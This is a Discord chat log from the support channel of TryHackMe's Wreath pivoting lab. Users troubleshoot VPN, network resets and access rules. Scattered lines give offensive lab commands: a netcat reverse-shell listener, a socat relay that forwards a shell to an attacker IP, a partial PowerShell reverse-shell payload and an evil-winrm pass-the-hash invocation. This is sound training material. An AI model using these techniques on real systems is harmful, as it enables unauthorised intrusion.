#wreath-network

You're welcome.

Hey, sorry if the question has already been asked. But can we start the Wreath network room ?

Hey, yes if you have a 7 day streak on THM

as its a soft release atm

Thx, It will be reset at the full release ? or just be upgraded ?

Soft release just means no announcements.

yeaah so progress caries on

^^^

Didn't know, thanks a lot ! 🙂

Wreath is currently out under a soft release with a 7 day streak requirement for access (this may be subject to change prior to the hard release).
This means that you are free to join and complete the network (https://tryhackme.com/jr/wreath) as you wish.
We would ask that you keep this fairly quiet for the time being (i.e. please don't Tweet, stream or make any big announcements for now), as this is still just the soft-release; however, once the network is released properly, feel free to do as you wish with regards to publicity.
Any bugs or issues, please ping me in this chat.
Most of all -- enjoy!

Me too

(That's talking about the second machine)

What's up with the third one?

Sorry, youre right

The second through the first one

Im having that problem too

I couldn't get a reverse connection though :/

Early this morning, scans were taking a lot of time, first 3 ports were

So you're getting three ports on box two?

open / filtered, then I spent some 20 mins with 14.37% progress on rest of the port

Yes

Yeah, nmap can be a little slow with it. I was noting that last night when testing it. Maybe try an alternative port scanner with it and see how that goes?

Okay, that's being very weird for different people. I see all four on the first instance of the network, but it doesn't seem to be replicating for the others. I'll switch the question around for it

Hi, every time I try to access wreath's room I get an alert from my AV and I can not access the room.Throwback's room worked great for me.
I do not have the option to upload a picture here unfortunately so I am attaching the alert.
"Today, 19/03/2021 15: 19: 17; Malicious object detected; Google Chrome; chrome.exe; C: \ Program Files (x86) \ Google \ Chrome \ Application \ chrome.exe; C: \ Program Files (x86 ) \ Google \ Chrome \ Application; 9028;; Active user; Detected; Detected; HEUR: Trojan.PowerShell.Generic; Trojan; High; Partially; https: //tryhackme.com/api/tasks/wreath ; wreath; https: //tryhackme.com/api/tasks; File; Expert analysis"
Thanks.

That's at your end I'm afraid. There's nothing dangerous about it -- you're the one making the request, after all

the main problem is , not getting a reverse connection :/ spent over 2 hours exhausting everything , silly me didn't recognized that the exploit works for UNIX then netcat isn;t on Target machine, so only option was using bash. which failed successfully

I'd suggest setting up an exclusion

Which box is that for?

wreath, 2nd one

Task 6

Task 6 is box one, yes?

Why not just use the inbuilt shell feature for the exploit?

I did! it didn't worked either

in fact, at times the exploit didn;t worked, but I kept repeating it

sometimes It worked, sometimes not,

Are you using a second VPN by any mischance?

sometimes, it didn;t accepted shell command as well

nope

OpenVPN, as suggested in instructions

As in, do you have any other VPNs connected? Nord/Proton/etc?
And is the VPN on your host machine, or in the VM?

nope, not at all

Thank you @merry robin for making this! I am cruising along the tasks breathing in the knowledge.

Interesting. Gimme a sec -- I'll confirm that it is working on the box here, then see if we can debug it for you 🙂

sure thing, it happened this very morning, some 7-8 hours ago Ig

here^^

The pseudoshell uses perl because it's guaranteed to be installed -- worth giving that a try

ahh

god

Just getting my copy of the network active to have a look now 🙂

I hope, the automated one works well with script soon!

and I'll get it on perl, it will work definitely

Okay thank you.

There are suggestions how can I work around this error?

I would suggest adding TryHackMe as an exclusion in your antivirus

@vital hill that is definitely working here, so, let's debug

What OS are you using?

Linux Mint

Check your firewall

I was using THM Attack box though

The AttackBox should be fine with it

Hm -- which IP were you sending the shell back to?

that which is given when attackbox starts,

where its mentioned, that use this ip for reverse shells

Oh, I have an idea of what's happening there

When you started the attackbox

Did you manually start the VPN?

I first established the VPN, downloaded that file and did stuffs to operate it , with sudo perms

then started attackbox

So, you ran the VPN pack

yup

So, that's the problem

When the AttackBox starts it automatically establishes a VPN connection to the network

Meaning you ran the pack a second time, which always causes issues

Lemme just check that is actually mentioned

actually, it goes like-

Yep -- last bit of Paragraph three there

I've just added a section in bold to make it clearer if you refresh the page?

Means I have not to do manually VPN connectivity ,

just launching attackbox works fine?

if yes, then that makes sense, I was skeptical, as if there are two instances

Yep

I'm failing

to get a reverse shell

sucks :/

great room thanks Muiri.. please if i stop this time i can come back again after 2 hours ?

Yep, of course 🙂

Once you're in there are no limits

Still on the AB, with one VPN open?

And not connected from any other machine?

AB :/

nope

Show me ip a?

Oh, I should clarify actually -- if the network goes to sleep you will lose any reverse shells / proxies you have setup

But the files aren't deleted, and there are obviously no autogens

So the same SSH key will work and chisel will still be there, etc

Looks good to me. What's the first target IP for you?

10.200.81.200

Can you ping it / exploit it Ok?

yeah !

oh that what i want to know the id_rsa for ssh still works and i already have access

but can't get reverse shell

:/

Type shell into the exploit and give it 10.50.82.4, with port 443

Then start netcat with sudo nc -lvnp 443 in the attackbox

Then press enter in the exploit

aight hold on

what?

It waits for you to start the listener before sending the shell

thank you it's well explained for every thing i will come back later ..

It tells you to press enter once you have a listener established

Thanks for all the amazing work 💪😄

You're enjoying it?

Muiri

It worked ❤️

Ayeeeee

will remember this!

Did you not press enter?

yuh!

Hehe, it happens, don't worry

followed your steps, and it worked

Awesome!

Keep going, and have fun!

I'm curious how wreath differs from throwback, except the obvious things.
Guess I'll find out in about a week 😉
But the resonance seems very positive and your "YOT*" were awesome 😄

Have you not been able to start it yet? 😦

Sure. It's gonna be a good laboratory for practice pivoting and av evasion 🖤

The big differences are in the content focus. Throwback is AD for a corporate network, Wreath is a lot smaller (for cost as much as anything else) and emulates a home network. It's designed to be a practice specifically for pivoting, messing around with empire, and having some fun with Windows Defender

Whereas Throwback obviously focussed on the AD attacks primarily

No, I'm currently learning more about RE and just doing some rooms now and then, so my streaks runs out regulary 😅

There may or may not be alternative methods to access it incoming

Given it's been approved and I know Ashu is working on it, I'm happy to say that (at least for now) subbed users will soon be able to get access without a streak.

I'm hesitant to say anything definitively because it's a soft-release and we're obviously still just playing around with what works from a balance perspective there

What if I don't finish it in the 9 days available ? Will i be able to take it back after ?

TL;DR -- once you join, it will remove you 10 days later; but you can rejoin without any requirements

Oh

Once you're in, that's you in -- you don't need a streak to get back in

ty !

That's purely because if you're in the room then you're assigned to a network -- even if you're finished with it

Being assigned to a network means costing money, so there's no point in that if you're not using it

Ok I understand better ty

Np!

Have fun!

for every x amount of users a new network is created. It use to be 5, that may have been bumped or reduced

Obviosuly it must stay profitable for the platform !

Especially with it being free -- it's not so much about the profit as meaning it's not running at too much of a loss 😆

Rather a lot more for Wreath, so we're monitoring that too

Last question : We would ask that you keep this fairly quiet for the time being (i.e. please don't Tweet, stream or make any big announcements for now) Everyone has access to this discord-channel or ?

correct, no limitations other than potentially verified users

Yeah, everyone has access to it in here, but we haven't done any social media releases for it yet, or anything like that

There may potentially also be a competition for the hard-release as well 👀

(Again, don't quote me on that though 😛)

Dark released his walkthrough 😄
But I guess I've the wrong kind of competition in mind, if there will be any competition 😉

Yeah, that was going to be saved for the hard-release, but hey, it's just as good here

The competition wouldn't be over completing the actual network though

silly dorkus storkus

It'd be for something that's mentioned throughout the network, but isn't actually covered in the videos

You need a shave, my friend 😆

you're not wrong

this is what covid does to you

True. I really need a haircut just now

I hate having long hair with a passion

Do I lose access to the wreath network if the 9 day counter runs out?

Nope, once your in, you can join it back

nice thanks!

long hair needs way too long to dry after washing

Can we stream Wreath Network on twitch?

Check pins

TL;DR: soon, but preferably not immediately 🙂

Once we've figured out exactly what's happening with the entry requirements and ironed out any little hitches, we'll release it properly with all the attached fanfare, etc

Until then it's kind of a case of keeping it vaguely on the down low though 😆

time to spread the news 😈

muha haha

also why isn't wreath underneath throwback in the discord? 🤔

Is it supposed to be in the support category?

Yeah, same as the Throwback support channel

There isn't a channel for people who have completed Wreath -- mainly because it's completely open anyway

Not that anyone discusses Throwback in that channel anyway

Probably been asked already, but if you pay for the premium sub, do you get instant access to the Wreath room without a 7 day streak?

Nope

You need a 7 day streak even if you have sub

Really? 🤦‍♂️

yep

Are you sure?

Wait do you not need a 7 day even if you have sub?

That's why Muir told me.

Oh never knew that

Oh, sweet, thanks James

Im a sub and still cant access the room for 6 more days lol

7 days makes me sad 😦 have not been on thm for some time and now this, well maybe at some point int the future

That's something that is in the process of being added

Not sure if Ashu has got around to it yet 🙂

Muiri, it's been fun and informative this far (31/45).

has anyone completed the network so far?

Hey, wanted to check if the first machine is pingable for anyone?

i seem to be connected

but cant ping the machine

Yes

besides testers

?

No

Not yet, although some are close

Should be

weird it isnt working for me

i will regenrate the vpn and check

yeaah idk if its just me

but even with regenerated connection pack it seems to not be reachable

Check your network is still active?

Muir is there gonna be some announcements for Wreath once it's "hard" released

so we can post on twitter etc.

i will check now, and try restarting my vm maybe it was conflicting with something

yeah seems to be giving me destination host unreachable error

i think its a bug, as i did a ping sweep and the IP is there just not the same as shown in the diagram

Yes, there will be

Wait, what IP is the diagram showing you and what IP exists?

10.200.81.200 and 10.200.81.250 respectively

250 is the openvpn server

It's always active

oohh

gg

ahh right, and just another quick question which I'm sure has been asked a million times today

Are you sure the network is still awake?

Refresh the page to make sure?

if we lose the streak once we're in the room, will we have to restart to regain access

Nah, once you're in, you're in

The 10 day thing is just so that people aren't in the room (and thus forcing a network to stay active) for longer than they need to be

tried once and the start button is greyed out the Extend button is active

Strange. @limber rover could you check the activity of 10.200.81.200 if you get a sec? 🙂

how many points is a user awarded completing the whole Wreath?

yeaah its strange as in the openvpn activity details page it says i am connected

@gray mortar 616

@young roost you're only connected once, right?

yes i restarted the vm a couple times

i will check from attackbox maybe

I would suspect that someone has shut down 200, tbh

Hence asking for an activity check on it

Yeah the instance associated with that IP address is stopped

yeaah seems like it

not terminated -- but stopped

Could you restart it please CMN?

Is this intended? I am not able to access ||port 10000||

Wait, is the actual network down @fair breach?

Yes. What error is it giving you?

ahh got it, i tried clicking on that ec2 link and got confused

Yeah, that probably won't work with the access controls

But https it

Don't think I can for the subnets wreath deploy on. But even then I think it'd get a bit funky on the frontend

*sigh* Ok, we need to implement auto restarts on those things.

Are you able to reset that network without the votes?

Shutdown at 17:50:01 shrugs I can't help out much more then that I'm afraid 😦

Out of interest, what about 150 and 100?

Man for wreath network we need to regenerate our wreath network file again right

You should just be able to download it

Ok thank you man

They're both stopped. I can't force a network reset/restart 😦

Ok, that sounds like the network has gone to sleep then, yes?

Sounds like it (:

Wonder if it's that extension thing again. Hm

@young roost if you're sure that the network is showing as alive, I'll try to get one of the admins to reset that instance without the votes

Extension thing? o.o

Otherwise, let it expire, then try to restart it

it says the network state : running

wreath is superior from what I hear

and the time for it to expire is 1h 24 m

If you clicked the extend button after the shutdown sequence initialised, it extended the timer but didn't restart the network.

Leading to exactly this situation.

Ahhh

That makes sense

probably thats what happened

I've asked for a reset. Worth trying to initiate one yourself though with the reset button

Failing that, just wait for it to expire then start it. That should fix

yess trying that, we have 4 resets out of 5

Cool.

If anyone else is in the 81 network, please reset!

thaank youu

pressing.

pressed, network resetting

thank you so much

https://tenor.com/view/the-office-bow-michael-scott-steve-carell-office-gif-14973267

Ayeee. Nice one

wait

i had a 7 day streak before

but i cant access it

come on

seriously? 😢

It goes off your current streak when you try to access it I'm afraid

ahhhhhhhhhhh

darn it

so i have to wait a week

Once you're in, you're in for good though 🙂

sigh so that means that i need to redo a streak for holo too

how long will the soft release last?

No idea on that one

ah ok i hope a week passes before because it looks like when it releases itll cost 20

Cost 20?

What do you mean?

on the streak page it says

20 streak = free network

Oh, that may just have not been updated. It was originally 10 days for holo, 20 for wreath. It then changed to 35 for wreath, and now 7

The short answer is: the admins are using the soft-release to figure out a good balance.

So we don't know what it will be, come the hard release

so if you get in the soft, then youre good even after it ends?

thats a pretty good deal 😂

Pretty much, aye

well thanks in advance and ill join in a week
thanks for the awesome and long awaited room, looked at the tasks and wow it looks awesome
❤️

Good to hear! Enjoy it when you start! ♥️

hi

hey

👋

thanks :)

Hi, sorry to msg again but wanted to confirm one thing its the hosts post compormising the machine

i think i have them but cant ping em

The what, sorry?

The IPs of the other two machines in the network

after getting a shell

Yeah, they're both Windows, and one of them isn't actually accessible from 200

So neither of them will respond to pings anyway

ahh okay thanks a lot , just wanted to confirm

Np!

Turning down his offer of payment, you tell him: I'll do it!

Who refuse a payment offer ?

Looking forward to these networks!!! I saw dark started posting on YouTube today 🙂

Awesome 😄
Just Wreath for now. Enjoy!

Task 6 Webserver Exploitation simply can't get a shell.

voted to reset

@simple trail are you using the AttackBox, and did you start your VPN manually?

@merry robin Thanks. It was fun.

hm 😄

(Steak limitation for subscribers only temporary)

Ayeeeee, nice one @solemn pendant!

I, uh, hate to break it to you, but...

There literally isn't an unban button

I'm trying to use curl to transfer a file from my attack box. But getting timed out. I can ssh into the box - do we have a run ovpn on the attack box as well?

You may need a wreath network configuration file

@opal badge the AttackBox connects to the wreath network automatically.
Where are you trying to curl from, and did you run the connection pack manually?

Also, are you a subscriber?

yes subscriber

Where were you curling from? Box 1?

trying to curl from the 1st box which I have connected via ssh with rsa key

Ok. Could you show me ip a on the AttackBox?

i've just restarted the attack box - getting 10.10.173.144

Are you starting the OpenVPN manually?

when i tried that I could not ping the 1st box and when i connected via ssh had no response until i stopped vpn

Yes. It connects automatically, so connecting manually causes problems.

Ok, so, what is the curl command you're using?

curl http://10.10.173.144:8080/nmap-mattit4o -o /tmp/nmap-matti4o

Ah, there's the problem

As I've reset box I will have to redownload the files need again

It's not the same IP

Do ip a and look for a 10.50.x.x IP

That's the IP you need to use for the network

ok seen that on tun1

will try again thanks

Let me know how it goes 👍

working thanks!

Wonderful 🙂

Muiri isn't joking. Bans from rooms are permanent, you will have to contact support.

if Muiri wants you to be unbanned.

There is literally no unban button. Unbans have to come straight from the top and are basically a case of manually editing the database.

Exactly ^

Just be glad it wasn't an admin who caught you in there. It's technically a breach of the computer misuse act (and most equivalents) because it was unauthorised access to a computer resource. Dark was outright deleting accounts for it.

I'm on the last question of Task 21 - trying to pass a hash instead of password, I get error - Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired

Error: Exiting with code 1
I get the same if i use the user i created but can connect via a password? Is there a bug in evil winrm 2.4?

Can you screenshot what you're doing @opal badge?

ok - spotted typo - entered wrong ip - need a coffee break as hacking for too long 😉

Haha, fair enough!
Yeah, get some rest

Covfefe

:0 I managed to pivot with a socat relay. This is so cool!

sshuttle is my fav

I got totally stuck on proxy pivoting

If git-serv was not accessible to outside world how was dark able to rdp into it and use evil-winrm? I am not able to connect to git-serv using evil-winrm

Using a pivot

Pivoting via the webserver box

But in the video he entered the git-serv's ip

yeah.

I got a powershell rev shell using pivot and created a new user to rdp/winrm into it

You still need to tunnel your traffic via the webserver

ohh you mean he is using proxychains?

I see, got it, gonna do that now

Or a different method of pivoting

Thanks for the help @strange bison

I'd recommend SShuttle over proxychains any day

got it gonna try sshuttle now

Just finished the network! Loved the network Muiri!! Will there be a role for this network too in THM discord?

He'll have been using sshuttle, yes

Also you guys should give certs if we submit a report!

Glad to hear you enjoyed it!
Probably not a role given it's free and we have so many roles that we literally break Discord already I'm afraid

lmao

but a cert? (if we submit a report)

Now that we can potentially arrange

There may also be some other stuff to do with reports incoming for the hard release as well

okay!

in case I get the report ready, where should I submit it? Room writeups ?

Yeah -- there are instructions in task 44. Style of a pentest report as a PDF on something like google docs where you can view it in browser, then just a link submitted as a writeup :)

cool!

I legit have my cherrytree document filled with tons of screenshots and files 🤣 !! Can't wait to write the report

Hehe, enjoy!

Will you accept writeup style writeups too?

Not for this one I'm afraid. I would have if there was a separate section for the reports, but in the end we decided it was just easiest to use the functionality that was already there.

Sad.

Wow finally made sshuttle to work, this is so awesome and easier to use then proxychains

I did say that in the network 😆

does the access to the network is 10 days?

After 10 days it kicks you out, but you can immediately join again. It's just to make sure that you're never forcing a network to remain active unnecessarily

oh ok ok

thanks i misunderstand that

||pivot pivot pivot pivot ||

Pivot is goooood

btw for the write ups/reports do we skip over the tutorial task questions and treat it as a pen test or its good to include them

one of the exploit is written in python2 😦

i am converting it

Converting python2 script into python3 sometimes takes a lot of time what's say @rustic shore

agree

this one should be easy

I think so most of the time parentheses works for the exploit

Maybe

i also use string formatting

Hmm that's nice

making it kinda clean

Truly clean

I did the Tony the tiger room in that only parentheses worked for the exploit.

i think it will aslo work

Maybe or we can convert it together and can post that in our own GitHub via collaboration

it worked it was easy

just brackets

Noice like it was similar in my case in Tony the tiger room

i think so

Now does it worked after adding brackets

yes

Cool

Treat it quite literally as a pentest report

Ignore the questions in the room -- just do it the way task 44 describes 🙂

Or a similar way, if you already have a report format that works for you -- there's no one correct way to do it

Thanks a lot , will do that i will try to do it as a pentest report then

Look forward to reading it! 🙂

I started my wreath vpn. Used that ip for shell as well

That'll be why then

It connects automatically when you're using the AttackBox

As in, you don't also need to connect manually

Again, blegh taking action that will break stuff without informing the user

It's in bold in the task!

I'll admit I haven't looked since I originally asked

OMG just wow and thanks to Muiri again !!! i learned yesturday socat for the first time and today i tried year of the fox by chance ..and guess what after upload linpeas ?? hahah no spoiler .. thanks again.just awsom

I do love socat

I’m using my kail

Hm, so what exactly is going wrong?

As in, what's happening and what are you trying to do?

i connect the wreath vpn on my kali. do the tasks. all normal until get a reverse shell

i enter the wreath ip. and the port tried either 4242 or 443, 53. none of them works

Can you screenshot?

the wreath network been reset. i changed the port to something random like4928. all works now, thank you !

Hi are we able to use nmap into the machine??? I mean we can upload nmap and use it??? Its allowed???

Mhm, go for it

Just save it in the name-username format please 🙂

Yeah yeah i upload before the nc and socat with my username in tmp folder

Ok ok i see clearly now

Im just confused

Anything that can be clarified?

Its clear and well explained as i told you 🙏🙏 thank you

im at task9 , love it so far

did someone ping?

#wreath-network Just completed Wreath Network - best weekends fun in a while 🙂 Thanks THM team

-undelete - a

Up to 10 last deleted messages (last hour or 12 hours for premium):

none...

https://tenor.com/view/sus-fry-futurama-gif-4691459

Keep seeing unread messages in here, clicking then nothing new

so do I, and also on other rooms not only here

It's because people delete messages

Fyi @lusty imp -- not sure why it didn't let you undelete it

Someone messaged, I undeleted, then deleted the undelete 🤷‍♂️

do i need to add the second ip i discovered to my hosts aswell to connect to the web server ?

Nah

strange, works with curl but i tried to access it on firefox 🙂

How did you pivot?

oh right it doesen`t have accs to the internet, sorry

incomplete ?

@surreal sail after 9 days you get removed from the network, but you don't lose progress, and can rejoin at any time without a streak 🙂

@surreal sail cost. Every user in the room is assigned to a network, which obviously costs a tonne to run. By removing people periodically we ensure that no one is in there who isn't actually working on it

Costs a lot to deliver a network for free 😄

why im out i was working

im in thanks

i have to repeat

in task36 i cannot access to the directory in webserver

||/resources||

What do you mean?

didnt get the window for credential

Screenshot it for me?

ok

Interesting. That looks to be loading, but not showing you the page

What browser is that?

Either way, try a different browser?

yeah

firefox

Your proxy also looks to be off?

yes is off

should be on ??

and chisel must be running ??

then why the first web is ok

i mean 10.200.81.100

is work without proxy

Now that, I don't know. Did you have the proxy on when you loaded the page?

No

first time yes when i run chisel

of course

So, yes

Okay, activate chisel and foxyproxy -- you need them to access .100

and i exit the evil-winrm

ok i will try

You'll always need at least chisel (or an alternative) to access .100 given it's protected from the outside network, and .200 can't access it

i see

really sorry.. works perfectly

Np!

I'd much rather know about potential problems, than have people stay quiet about them 🙂

loving Wreath so far, (only up to task 21, trying to take good notes) - one thing I'm not sure on is I guess are there 'save spots' like I need to leave for now and might not be back for the day will things like an SSH key change ? I'm assuming my rce-username.php will probably disappear/be on another network later perhaps?

not that it was very time consuming to set up anyway

Wreath's really designed to be good for checkpoints

SSH keys / passwords won't change unless someone's being a twit

simultaneous upvotes

good to know, thank you 😄

So yeah, you should see some nice checkpoints appear

I was really really pleased seeing how it was designed that way, I was testing on random evenings every few days

Thanks Muir, love all the awesome information on pivoting, I am really weak with that so I love the chance to learn it and practice it

Oh, to answer the question r/ the exploit.php
There's no clean up, so, if the network gets reset it will disappear, or if you get moved into a different network when you're kicked out (not sure there) then it will obviously be different

But otherwise it'll be there

yeah, np, given how easy that exploit is I don't think i'll have any trouble re-creating it as needed anyway if that does happen 😄

The correct number of answer for open port is slightly less than the number of open ports nmap scan gave me. Is this normal? How else can I scan to get the accurate result? I've tried with SYN scan.

Which box?

Task 5 Enumeration

If it has anything to do with port 9050 on 10.200.81.200, or something along those lines, it's a listener we've got running with one of the Empire devs just now

There are two ports 9*** with one closed and the other open. So I guess the one that is open is the listener you are talking about.

Yeah -- apologies about that. Just ignore it -- it'll go away soon 🙂

That was really fun. Thanks to everyone who put work into that!

I am trying to open the port in firewall but it is showing ||"FirewallD is not running"||

I have trouble accessing 10.200.82.200...I already had necessary access last time, but now I get a "no route to host" error for SSH

Ignore that...10th time's the charm^^

Finished 🙂 Thanks again, I'm now a lot more comfortable tackling windows machines

That sounds like someone has been messing with that box. Try resetting it.

The streak limitation for subscribers got removed 🥳 or at least edited. I got in with a 5 day streak :)

Yay. Code push

-undelete -a

Up to 10 last deleted messages (last hour or 12 hours for premium):

46 seconds ago (Mon Mar 22 11:31:55 2021) Cyb3ri0us#3578: Final release ??

Soon @ember solstice

Not quite yet, but this should be the final setting for the entry requirements.

ah ok, nice 😄

Sorry if this was asked before,but i didn't find it. What happens after the "9 days of access left" expire? 🙂 Can it be accessed again? considering i'm a subscriber.

It's in the top of task two, for reference 🙂
When you join a network, you're allocated into an instance of that network. These instances cost a tonne to run. Removing people periodically means that they aren't in the network when they're not actually using it, which means they aren't taking up a space in one of the instances (which would mean costing a lot of money in a free network unnecessarily).

You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once. 🙂

Lez goooo

Ayeeeee

Well done

Upvote button upvote button

Yeah, Skidy added it in last night for me 🙂

wooooooooooooah i can access wreath now

letsgoooo

Ayeeeeee

Have fun

idk how but im not asking questions

Steak limitation only for non-subscribed users)

ahhhh

makes sense

also why do you have only 10 access days?

That's explained in task 2

#wreath-network message

And about six messages up

ah thanks

sorry

Np 😆

Should probably pin that tbh

FAQ:
Why do I get kicked every ten days?

When you join a network, you're allocated into an instance of that network. These instances cost a tonne to run. Removing people periodically means that they aren't in the network when they're not actually using it, which means they aren't taking up a space in one of the instances (which would mean costing a lot of money in a free network unnecessarily).

You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once; but you will need to redownload the VPN connection pack

nice

so basically i won't be able to access it after 9 days?

You'll still be able to join back

oh nice

perfect thanks!

the machines dont respond to ping do they?

The first one definitely does

ah

because im connected to vpn and pings are getting lost; nmap is going nowhere

i had to add -Pn

The others do if you follow the tasks and do it from the first machine

Everything has to be pivoted through first machine

im still on the first one 😂

am i doing something wrong

cant ping 10.200.72.200

Check task 9

im still on task uh

3

Are you connected to the Network VPN or your normal one ? Just to make sure

network one

i feel like im doing a dumb thing but i dont know what 😂

Multiple vpns ?

no no

Well then sorry can’t help since I haven’t done the room yet 😄

its ok

Yeah its gotta be VPN if you cant ping

Id double check

granted my ip is dif cuz im in a dif network

So you're on 72.x right?

weird

maybe im not

net_route_v4_add: 10.200.92.0/24 via 10.50.93.1

the display shows 72

@merry robin stuff broke

hmmm i think i knwow why

its because for some reason i got a wreath vpn generated befoer i started

and it might have been in 72.x

Leave, rejoin, and download a new pack

ya im doing that

You're in the dev network -- we ran out of new networks earlier, which meant it glitched a bit

😂

i regenned and now its on 72

thanks

That's still wrong

Leave the room, rejoin, regen and download?

well i can ping it now?

should i not be on 72?

Yeah, but you're in the dev network

ah

ok

lol

Dont leave the dev network! SCAN EVERYTHING!

jk

haha

ya now im on 92

🤷

i wonder how i got on the dev net by accident

Put simply -- too many people joined

ah

There were a certain number of networks requisitioned -- they all filled up

So the site started breaking the limit of people and sticking them back in the first network

Does it not auto scale?

It does -- to a fixed limit

huh

It was set to 10 instances. It's currently at 40

But obviously those will only come into play when they're needed -- that's just a maximum

also - is it normal that i got the first 3 ports right away but the 4th port takes a looong time

because i still havent gotten it

Aye. The first three are low down. The fourth is higher

thank

Feel free to use something like Rustscan if you want it faster though

oh yeah i forgot about that lmao

ya rustscan got it super fast

Don't tell Bee

👀

is this network beginner enough to start if I haven’t made it through the whole offensive pentesting path? for context, I made it up to terminator, and have finished the whole complete beginner path

There is enough information in each task, and it goes step by step, to allow you to work through it with minimal background. HOWEVER, you'd be much better served if you got that foundational stuff first. Will help you figure out bumps along the way if you dont execute something correctly. However, it doesnt lose you anything if you wanted to jump in and try!

But James might not be as nice if you ask questions that might be more common sense if you had a better understanding of the foundational stuff. KIDDING.

Well, that's not very nice to poor James

uhh btw

for uploading ssh keys in the task 11

we do like <username>-key right?

and anywhere specific to upload it?

Why are you uploading SSH keys?

Because SSH keys make dreams

ah wait

i just realized its an example lmao

dont mind me 😂

-warn @bronze shuttle Please be polite. Even if you're joking you should still consider that there's a measure of kindness even required with jokes, especially as this is a semi-professional environment. Additionally, community staff are volunteers so please be polite for that measure as well.

⚠ Warned the4rchangel#2830

I appreciated the humor, for what it’s worth 😅

this is probably not the right channel, but im curious: how does thm know when you've rooted a box?

You mean the lightning?

ya

It's linked to answering a specific question

It's not rooted it's compromised

ohh ok

(thats what i meant)

Yeah -- it's essentially just me telling the admins which questions indicate you've broken it

Usually the password hash ones

makes sense

anyone else having trouble using sshuttle? im using the correct commands but can't seem to access the webpage of the internal target

Can you screenshot?

That's intended

Read the page 🙂

It let you connect -- the error is from the webserver, not your browser

🙃 🙃 🙃

thanks!

I took a break and came back after grabbing the ssh private key. I tested it at first and everything worked(from task 6). Came back and now I can not ssh into the machine. I also can not run the exploit to grab a new shell. I have re-downloaded my vpn key. Ping does not work and a port scan returns filtered... I'm kinda at a loss here at what I borked!

Website loads just fine though

Are you sure the network is alive?

What subnet are you on?

10.200.90.0/24 for the wreath 10.50.91.14 is my tun0

Looks right

Is the network still alive?

yah says running in the network map

ssh says no route to host

@fair breach could you just check that 10.200.90.200 is alive please?

Try restarting your VPN?

aahhh i cant copy anything from xfreerdp with +clipboard flag on

Copying to your host or to Kali?

oh wait

no its just suuper finicky

It is

@merry robin Yah and I even tried regenerating it and trying again

you need to like re-paste it and copy it or else it gives you this tihng that crashes browsers 😂

Logging in

It's stopped

Are the others in that network alive?

Uh-oh.. You can only increase the expiry time for a maximum of two hours.

reeee

Stopped at 19:00:01 GMT

aaaaa its gonna delete my account

gotta go fast and get that hash

All of them?

Or just .200?

Everything on 10.200.90.* is stopped minus the vpn server

Well that would be why I cant connect! Thanks for looking it!

Must be that bloody extension bug again

Call for a reset. If the network sleeps and you restart it then it should also fix, but you don't want to wait that long

And there's always gonna be some muppet that just presses extend for the giggles

its at 3/5 votes, Ill work on other things till it resets... awesome content guys, im really loving it and can't wait to dive into the pivoting section

Pivoting into the pivoting section. 😎

damn I missed a great chance at a pun 😩

ahhhh empire's modules are sooo slow

i feel like im doing something wrong

oh wait

the agent isnt responding 😢

uhhhhhh i cant get a responding agent D:

ohh wait

...nope

doesnt respond

i setup a hop thing

ahhhhh

firewall thing is open too

they initally connect but then they die

Yeah, there's a little bit of a problem with them just now -- I was working with the devs to fix it last night

They've got a fix for it, but I'm not sure if it's been pushed yet

Is it ok to stream Wreath THM network on Twitch?

Not until hard release

hmm, i can't get Invoke-Portscan loaded into memory

Get-Help could not find Invoke-Portscan in a help file in this session. To download updated help topics type: "Update-Help". To get help online, search for the help topic in the TechNet library at https:/go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help Invoke-Portscan
+ ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
    + FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand

Once it is announced on the social media networks.

using the -s argument, tried with sudo as well

@cyan vine when is the planned hard release

sudo evil-winrm -i SNIP -u SNIP -H SNIP -s /usr/share/powershell-empire/data/module_source/situational_awareness/network/

anything wrong with ^?

I have no idea :p

they're just not found

oh wait

im dumb

lmao

brain fart forgot to init the script

it just seems like they fixed the streak and allow people to join it ahead of streak if you are subbed

@cyan vine

ye

So, that's an interesting question.
We're trying to avoid the same problem we had earlier with having too many people in the room and overflowing the requisitioned networks.
The room is currently half "full"

do you need me to leave it?

The Hard Release was planned for very soon, but it may need to be delayed a little so that some of the people in there are chucked out by the timer

network half empty, room half full

Given there are a bunch in there who have joined but aren't actually doing anything with it

Not if you're actively using it, no 😄

One person won't really make a difference either way though

realized i could join and was going to start today

@merry robin just wanted to know if i could stream it

seems like a no so far

or no for now

Yeah, just until the hard release, although given that's been set, it's less of an issue.
Once it's out officially then feel free to go nuts with that kind of stuff 🙂

ok will bash my head over that after work

@merry robin thanks for making it!!!

My pleasure!

waits for slow as heck evilwinrm to upload chisel

you could

wait

chisel windows zip contains something that doesnt have an extension

how am i supposed to run it?

there should a pre compiled version somewhere

unless you want to compile it your self i guess

ah wait hm

had to add an exe ext

Guys, I am so dummy
i stucked, how i can set up a relay to forward a shell back to my local listener
set up relay on victim

./socat tcp-l:16888 tcp:MY_IP:9001

set up listener on attacker

nc -nvlp 9001

and make request a=powershell....('10.200.72.150,16888')....

huh

i think i got shit xD

honestly i just did the listener on ||.200||

just push a static nc

yeah

but i want try hard

lmao

i didn't use socat

You're currently sending it to itself

It needs to go to .200

what i should add?

in socat... I read docs there is relay setup

Change the IP in the payload to 10.200.72.200

oh may

sec!!

yes, got callback
but connect drop every time

No idea there. Might be something to do with the fact you're one of about a hundred users in my dev network 😆

yeah

Or might be something in the payload. You shouldn't need to tell it to fork for that one iirc -- it's a constant connection

thanks man
appreciated !!

oh shoot this git download is sloooooow

Yeah -- might take a couple of minutes, that one

welp

thats a while

sigh the progress bar hasnt even appeared yet

ohh its done

What that mean ?
9 days of access left

Check the pins please 🙂

Or task 2

It's in the network

hmm, the ||/resources|| page is infinitely loaded

it promots me with basic auth fine, but just keeps loading

oh nvm

Yeahhh

Hey anyone having issue with the reverse shell in task 6 ?

What's wrong with it?

It not connecting to my nc

I tried to connect it manually, still it didn't worked.

Are you on the AttackBox?

nope on my local machine

What OS?

Kali

make sure its your tun0 ip 😂

Yeah i did😆

What IP did you use?

I am sure about that

Look at the second to last q there

okay 10.50..

I got in straight from that

Skipped shell

Man something is wrong cause i have been for last half hour

Can you ping your own box?

yes i can

